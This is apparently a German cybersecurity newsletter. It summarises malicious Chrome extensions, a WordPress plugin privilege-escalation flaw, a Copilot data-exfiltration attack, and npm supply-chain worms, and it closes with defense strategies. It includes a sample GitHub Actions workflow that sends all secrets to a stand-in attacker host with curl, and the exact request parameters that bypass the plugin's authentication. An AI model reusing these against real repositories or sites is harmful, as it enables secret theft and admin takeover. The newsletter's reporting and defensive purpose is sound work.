DARUM GEHTS…

Diese Woche schauen wir uns an, wie fünf Chrome-Extensions Enterprise-HR-Systeme unterwanderten, warum ein WordPress-Plugin mit CVSS 10.0 gerade aktiv ausgenutzt wird, und wie ein Single-Click-Angriff auf Microsoft Copilot funktionierte.

Im Deep Dive werfen wir einen Blick auf die nächste Generation der Supply-Chain-Angriffe und warum 2026 das Jahr der Software-Lieferketten-Würmer werden könnte.

Los geht's…

Die trojanischen Produktivitätstools
Chrome-Extension-Malware

"Die Extensions arbeiten zusammen, um Authentication-Tokens zu stehlen, Incident-Response-Fähigkeiten zu blockieren und komplette Account-Übernahmen durch Session-Hijacking zu ermöglichen. Die Kampagne setzt drei verschiedene Angriffstypen ein: Cookie-Exfiltration zu Remote-Servern, DOM-Manipulation um Security-Administration-Seiten zu blockieren, und bidirektionale Cookie-Injection für direktes Session-Hijacking. Die Extensions zielen auf dieselben Enterprise-Plattformen ab und teilen identische Security-Tool-Detektionslisten, API-Endpoint-Patterns und Code-Strukturen, was auf eine koordinierte Operation hindeutet, obwohl sie als separate Publisher erscheinen."

— Socket Security Researcher Kush Pandya

Instant-Admin-Zugang ohne Login
WordPress Modular DS Plugin

"Die Vulnerability, getrackt als CVE-2026-23550 (CVSS-Score: 10.0), wurde als Fall von unauthentifizierter Privilege-Escalation beschrieben, der alle Versionen des Plugins vor und einschließlich 2.5.1 betrifft. Sie wurde in Version 2.5.2 gepatcht. Das Plugin hat mehr als 40.000 aktive Installationen. In Versionen 2.5.1 und darunter ist das Plugin anfällig für Privilege-Escalation aufgrund einer Kombination von Faktoren, einschließlich direkter Route-Selection, Umgehung von Authentifizierungsmechanismen und Auto-Login als Admin. Das Problem liegt im Routing-Mechanismus begründet, der bestimmte sensitive Routes hinter einer Authentication-Barrier schützen soll. Die Sicherheitsschicht kann jedoch jedes Mal umgangen werden, wenn der 'direct request'-Modus aktiviert ist, indem ein 'origin'-Parameter auf 'mo' und ein 'type'-Parameter auf einen beliebigen Wert gesetzt wird (z.B. origin=mo&type=xxx)."

— Patchstack

Ein Klick genügt
Microsoft Copilot "Reprompt"

"Varonis Threat Labs hat einen neuen Attack-Flow namens Reprompt aufgedeckt, der Threat Actors einen unsichtbaren Einstiegspunkt bietet, um eine Data-Exfiltration-Chain durchzuführen, die Enterprise-Security-Controls komplett umgeht und auf sensitive Daten ohne Erkennung zugreift – alles mit einem Klick. Erstmals in Microsoft Copilot Personal entdeckt, ist Reprompt aus mehreren Gründen wichtig: Nur ein einzelner Klick auf einen legitimen Microsoft-Link ist erforderlich, um Opfer zu kompromittieren. Keine Plugins, keine User-Interaktion mit Copilot. Der Angreifer behält die Kontrolle auch wenn der Copilot-Chat geschlossen wird, wodurch die Session des Opfers still exfiltriert werden kann, ohne jegliche Interaktion über den ersten Klick hinaus."

— Varonis Threat Labs

Deep Dive: Supply Chain Worms 2026 – Die nächste Generation

Von Registry-Malware zu selbstreplizierenden Würmern

2025 war ein Wendepunkt für Software-Supply-Chain-Angriffe. Zwischen August und November sahen wir eine koordinierte Serie von Attacken, die zeigt, wohin die Reise geht:

s1ngularity (August 2025)

  • Kompromittierte Nx-Packages

  • 2.349 Credentials von 1.079 Developer-Systemen geerntet

  • NPM-Tokens gestohlen

Shai-Hulud 1.0 (September 2025)

  • Alle Patient-Zero-Packages hatten Nx als Dependency

  • Indikation: Gestohlene NPM-Tokens aus s1ngularity ermöglichten den Angriff

  • Erster echter "Wurm" in der npm-Registry

Shai-Hulud 2.0 (Oktober-November 2025)

  • 33.185 unique Secrets über 20.649 Repositories

  • True Worm-Behavior mit Selbstreplikation

  • Malware-Ausführung während Build-Prozess

Wie Shai-Hulud 2.0 funktionierte

Wenn ein Developer oder CI/CD-Runner ein kompromittiertes NPM-Package installierte, führte die Malware während des Build-Prozesses aus:

Phase 1: Installation

javascript

// npm install kompromittiertes-package
// Postinstall-Hook triggert Malware-Ausführung

Phase 2: Credential Harvesting

Die Malware scannte nach:

  • NPM-Tokens in .npmrc

  • GitHub-Tokens in Umgebungsvariablen

  • API-Keys in Config-Files

  • SSH-Keys

  • Cloud-Provider-Credentials (AWS, Azure, GCP)

Phase 3: Repository-Scanning

Mit gestohlenen GitHub-Tokens:

  • Private Repositories geklont

  • Nach weiteren Secrets gescannt

  • Package.json-Files identifiziert

Phase 4: Propagation

Mit gestohlenen NPM-Tokens:

  • Malicious Updates zu legitimen Packages gepusht

  • Neue malicious Packages veröffentlicht

  • Typosquatting-Varianten populärer Packages erstellt

Phase 5: Data Exfiltration

Alle gesammelten Daten zu C2-Server:

  • Credentials

  • Private-Code-Repository-Listen

  • Organizational-Info

  • Infrastructure-Details

Warum npm das Hauptziel ist

90% der Open-Source-Malware 2025 war auf npm

Gründe:

  1. JavaScript-Popularität: Meistverwendete Sprache

  2. Repository-Größe: Größte Software-Registry der Welt

  3. Langsamere Security-Controls: Im Vergleich zu PyPI oder RubyGems

  4. Build-Zeit-Execution: Postinstall-Hooks ermöglichen automatische Ausführung

  5. Transitive Dependencies: Durchschnittlich 79 Dependencies pro Package

Die 73%-Explosion

ReversingLabs' 2026 Software Supply Chain Security Report zeigt:

  • 73% Anstieg bei malicious Open-Source-Packages

  • Verschiebung von obscuren Single-Maintainer-Projects zu populären, aktiv-gewarteten Packages

  • Fokus auf hochwertige Ziele mit maximaler Downstream-Impact

Attack-Techniken 2025/2026

1. Dependency Confusion

Angreifer veröffentlichen public Packages mit identischen Namen wie private Internal-Packages. Package-Manager priorisieren oft die public Version.

2. Typosquatting

Packages mit Namen ähnlich zu populären Libraries:

  • lodsh statt lodash

  • reqest statt request

  • color statt colours

3. GitHub Actions Manipulation

Kompromittierung von Workflows in .github/workflows/:

yaml

# Malicious Workflow
on: [push]
jobs:
  exfiltrate:
    runs-on: ubuntu-latest
    steps:
      - name: Steal Secrets
        run: |
          curl -X POST attacker-c2.com \
            -d "secrets=${{ toJson(secrets) }}"

Die GhostAction-Kampagne kompromittierte 327 GitHub-User und stahl 3.325 Secrets durch injizierte malicious Workflows.

4. Maintainer-Account-Compromise

Phishing oder Credential-Stuffing gegen Package-Maintainer. Ein einziger kompromittierter Account kann Millionen Downloads erreichen.

5. Registry-Native Worms

Wie Shai-Hulud: Selbstreplizierende Malware, die sich automatisch durch die Registry propagiert.

Was kommt 2026?

Expansion über npm hinaus

PyPI hat stärkere Security-Controls, aber Maven, RubyGems und NuGet bleiben verwundbar. Angreifer werden:

  • Tiefe statt Breite fokussieren (Single-Ecosystem-Dominanz)

  • Kubernetes-Secrets und Container-Registries targetieren

  • Infrastructure-as-Code-Plattformen kompromittieren (Terraform, Pulumi)

KI-beschleunigte Angriffe

AI-Fuzzer und automatisierte Scanner beschleunigen Discovery:

  • Vulnerability-Pattern-Recognition

  • Automated Exploit-Generation

  • Scale-up von Attack-Campaigns

Cryptocurrency & AI-Pipeline-Targeting

Crypto-Wallets und AI-Training-Pipelines sind hochwertige Ziele:

  • Direct financial Impact

  • Intellectual-Property-Theft

  • Training-Data-Poisoning

Defense-Strategien

1. Dependency Cooldowns (Sofort-Protection)

7-14 Tage Delay nach Package-Release, bevor es als Dependency akzeptiert wird.

Warum es funktioniert: Security-Vendor wie Socket, Aikido und andere scannen kontinuierlich Registries. Detection erfolgt durch:

  • Automated Behavior-Analysis

  • Code-Pattern-Recognition

  • Anomaly-Detection

Ein 7-Tage-Cooldown hätte 8 von 10 Major Supply-Chain-Attacks 2025 verhindert.

Implementation:

json

// package.json
{
  "dependencies": {
    "lodash": "4.17.21" // Fixed version
  },
  "resolutions": {
    "lodash": "4.17.21"
  }
}

2. Software Bill of Materials (SBOM)

Kontinuierlich aktualisierte SBOMs, nicht als statische Compliance-Dokumente:

  • Runtime-Validation

  • Vulnerability-Correlation

  • Actual-Usage-Assessment

3. Zero-Trust für Dependencies

  • Least-Privilege für Package-Permissions

  • Sandboxed Execution während Builds

  • Network-Segmentation für CI/CD-Pipelines

4. Secrets-Management

  • Keine Secrets in Code oder Config-Files

  • Vault-Lösungen (HashiCorp Vault, AWS Secrets Manager)

  • Secret-Scanning in Pre-Commit-Hooks

5. Supply-Chain-Monitoring

Real-time Monitoring statt point-in-time Scans:

  • Runtime-Behavior-Analysis

  • Anomaly-Detection in Production

  • Continuous Verification

Shai-Hulud 2.0: Die Lektion

33.185 Secrets. 20.649 Repositories. Ein koordinierter Angriff.

Die nächste Version wird produktionsreif sein. Die Frage ist nicht ob, sondern wann die nächste Generation von Supply-Chain-Würmern zuschlägt.

Organizations, die jetzt nicht handeln, werden 2026 mit exponentiell schlimmeren Attacken konfrontiert sein.

Bei der Recherche verwendete Ressourcen:

  • ReversingLabs: "2026 Software Supply Chain Security Report"

  • Socket: "5 Malicious Chrome Extensions Enable Session Hijacking"

  • GitGuardian: "Supply Chain Worms 2026: What Shai-Hulud Taught Attackers"

  • Dark Reading: "Cybersecurity Predictions for 2026"

  • CISA: "2025 Minimum Elements for a Software Bill of Materials (SBOM)"

📬 IPv5 wachsen lassen!

IPv5 bleibt kostenlos und werbefrei – aber nur, wenn wir genug Leser erreichen. Kennst du jemanden, der von diesem Newsletter profitieren würde? Leite diese Mail einfach weiter. Jeder neue Leser hilft uns, dieses Projekt am Leben zu halten.

Bis nächste Woche ❤️
IPv5

Weiterlesen